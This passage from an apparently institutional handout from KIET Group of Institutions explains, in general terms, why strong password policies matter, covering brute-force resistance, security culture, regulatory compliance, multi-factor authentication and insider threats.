their own proprietary information and the personal data of their customers.
Defense Against Brute Force Attacks: Hackers often use automated tools to systematically try different
combinations of characters until they crack a password. Strong passwords with a mix of letters, numbers,
and symbols exponentially increase the time and effort required to break into an account, deterring brute
force attacks.
Enhanced Security Culture: Implementing robust password policies fosters a culture of security within an
organization. It encourages employees and users to prioritize cybersecurity and take proactive measures to
protect their accounts and data.
Compliance with Regulations: Many industries are subject to strict regulations governing data protection
and privacy. Strong password policies are often a fundamental requirement for compliance with these
regulations, helping organizations avoid hefty fines and legal consequences.
Protection Beyond Passwords: In addition to strong passwords, enforcing other security measures like
multi-factor authentication (MFA) further bolsters defenses against unauthorized access. These additional
13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206
Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

layers of security provide an added level of assurance, especially in the event that passwords are
compromised.
Mitigation of Insider Threats: Strong password policies not only guard against external threats but also
help mitigate the risk of insider threats. Employees with malicious intent or those who inadvertently
compromise their credentials pose a significant risk to an organization's security. Strong passwords add an
extra barrier against such threats.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu

You might also like